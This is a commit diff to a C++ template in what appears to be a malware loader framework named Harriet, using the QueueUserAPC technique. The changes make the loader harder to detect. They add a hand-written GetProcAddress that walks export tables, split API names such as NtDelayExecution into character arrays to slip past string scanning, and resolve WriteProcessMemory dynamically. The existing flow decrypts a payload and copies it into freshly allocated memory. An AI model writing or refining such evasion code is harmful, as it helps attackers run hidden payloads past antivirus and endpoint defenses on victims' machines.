2 лет назад · ffcc66e5ea
--- a/Harriet/Harriet/QueueUserAPC/template.cpp
+++ b/Harriet/Harriet/QueueUserAPC/template.cpp
@@ -9,13 +9,47 @@
 
				 #pragma comment (lib, "advapi32")
			
 
				 #pragma comment(lib, "ntdll")
			
 
				 
			
 
				-using Random6 = NTSTATUS(NTAPI*)();
			
 
				+// Custom GetProcAddress function
			
 
				+typedef FARPROC(__stdcall* ARPROC)(HMODULE, LPCSTR);
			
 
				+
			
 
				+FARPROC myGetProcAddress(HMODULE hModule, LPCSTR lpProcName) {
			
 
				+    PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)hModule;
			
 
				+    PIMAGE_NT_HEADERS ntHeaders = (PIMAGE_NT_HEADERS)((BYTE*)hModule + dosHeader->e_lfanew);
			
 
				+    PIMAGE_EXPORT_DIRECTORY exportDirectory = (PIMAGE_EXPORT_DIRECTORY)((BYTE*)hModule +
			
 
				+        ntHeaders->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
			
 
				+
			
 
				+    DWORD* addressOfFunctions = (DWORD*)((BYTE*)hModule + exportDirectory->AddressOfFunctions);
			
 
				+    WORD* addressOfNameOrdinals = (WORD*)((BYTE*)hModule + exportDirectory->AddressOfNameOrdinals);
			
 
				+    DWORD* addressOfNames = (DWORD*)((BYTE*)hModule + exportDirectory->AddressOfNames);
			
 
				+
			
 
				+    for (DWORD i = 0; i < exportDirectory->NumberOfNames; ++i) {
			
 
				+        if (strcmp(lpProcName, (const char*)hModule + addressOfNames[i]) == 0) {
			
 
				+            return (FARPROC)((BYTE*)hModule + addressOfFunctions[addressOfNameOrdinals[i]]);
			
 
				+        }
			
 
				+    }
			
 
				+
			
 
				+    return NULL;
			
 
				+}
			
 
				 
			
 
				-static NTSTATUS(__stdcall *NtDelayExecution)(BOOL Alertable, PLARGE_INTEGER DelayInterval) = (NTSTATUS(__stdcall*)(BOOL, PLARGE_INTEGER)) GetProcAddress(GetModuleHandle("ntdll.dll"), "NtDelayExecution");
			
 
				+typedef BOOL(WINAPI* WriteProcessMemoryPtr)(
			
 
				+    HANDLE hProcess,
			
 
				+    LPVOID lpBaseAddress,
			
 
				+    LPCVOID lpBuffer,
			
 
				+    SIZE_T nSize,
			
 
				+    SIZE_T* lpNumberOfBytesWritten
			
 
				+);
			
 
				 
			
 
				-static NTSTATUS(__stdcall *ZwSetTimerResolution)(IN ULONG RequestedResolution, IN BOOLEAN Set, OUT PULONG ActualResolution) = (NTSTATUS(__stdcall*)(ULONG, BOOLEAN, PULONG)) GetProcAddress(GetModuleHandle("ntdll.dll"), "ZwSetTimerResolution");
			
 
				+unsigned char HvqNFK[] = { 'n', 't', 'd', 'l', 'l', '.', 'd', 'l', 'l', 0x0 };
			
 
				+unsigned char sQKsNqz[] = { 'N', 't', 'D', 'e', 'l', 'a', 'y', 'E', 'x', 'e', 'c', 'u', 't', 'i', 'o', 'n', 0x0 };
			
 
				+unsigned char UHVQNq[] = { 'Z', 'w', 'S', 'e', 't', 'T', 'i', 'm', 'e', 'r', 'R', 'e', 's', 'o', 'l', 'u', 't', 'i', 'o', 'n', 0x0 };
			
 
				 
			
 
				-static void SleepShort(float milliseconds) {
			
 
				+static NTSTATUS(__stdcall* NtDelayExecution)(BOOL Alertable, PLARGE_INTEGER DelayInterval) =
			
 
				+    (NTSTATUS(__stdcall*)(BOOL, PLARGE_INTEGER))myGetProcAddress(GetModuleHandle(HvqNFK), sQKsNqz);
			
 
				+
			
 
				+static NTSTATUS(__stdcall* ZwSetTimerResolution)(IN ULONG RequestedResolution, IN BOOLEAN Set, OUT PULONG ActualResolution) =
			
 
				+    (NTSTATUS(__stdcall*)(ULONG, BOOLEAN, PULONG))myGetProcAddress(GetModuleHandle(HvqNFK), UHVQNq);
			
 
				+
			
 
				+static void Random4(float milliseconds) {
			
 
				     static bool once = true;
			
 
				     if (once) {
			
 
				         ULONG actualResolution;
			
@@ -27,8 +61,10 @@ static void SleepShort(float milliseconds) {
 
				     interval.QuadPart = -1 * (int)(milliseconds * 10000.0f);
			
 
				     NtDelayExecution(false, &interval);
			
 
				 }
			
 
				-unsigned char sntdll[] = {'n','t','d','l','l', 0x0};
			
 
				-unsigned char sNtA[] = {'N','t','T','e','s','t','A','l','e','r','t', 0x0 };
			
 
				+
			
 
				+using Random6 = NTSTATUS(NTAPI*)();
			
 
				+
			
 
				+unsigned char sNtA[] = { 'N','t','T','e','s','t','A','l','e','r','t', 0x0 };
			
 
				 
			
 
				 int DecryptData(char* Random3, unsigned int Random3_len, char* Random2, int Random2len) {
			
 
				     HCRYPTPROV hProv;
			
@@ -69,7 +105,7 @@ int main() {
 
				 
			
 
				     FreeConsole();
			
 
				 
			
 
				-    Random6 Random7 = (Random6)(GetProcAddress(GetModuleHandleA(sntdll), sNtA));
			
 
				+    Random6 Random7 = (Random6)(GetProcAddress(GetModuleHandleA(HvqNFK), (LPCSTR)sNtA));
			
 
				 
			
 
				     SIZE_T Random4 = sizeof(Random3);
			
 
				 
			
@@ -80,9 +116,24 @@ int main() {
 
				 
			
 
				     LPVOID Random5 = VirtualAlloc(NULL, Random4, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
			
 
				 
			
 
				-    SleepShort(3000);
			
 
				+    Sleep(3000); // Corrected Sleep function name
			
 
				+
			
 
				+    WriteProcessMemoryPtr pWriteProcessMemory =
			
 
				+reinterpret_cast<WriteProcessMemoryPtr>(myGetProcAddress(GetModuleHandleA("kernel32.dll"), "WriteProcessMemory"));
			
 
				 
			
 
				-    WriteProcessMemory(GetCurrentProcess(), Random5, Random3, Random4, NULL);
			
 
				+
			
 
				+if (pWriteProcessMemory != nullptr) {
			
 
				+    // Using native API WriteProcessMemory
			
 
				+    if (pWriteProcessMemory(GetCurrentProcess(), Random5, Random3, Random4, nullptr)) {
			
 
				+        
			
 
				+    }
			
 
				+    else {
			
 
				+        
			
 
				+    }
			
 
				+}
			
 
				+else {
			
 
				+   
			
 
				+}
			
 
				 
			
 
				     RtlCopyMemory(Random5, Random3, Random3_len);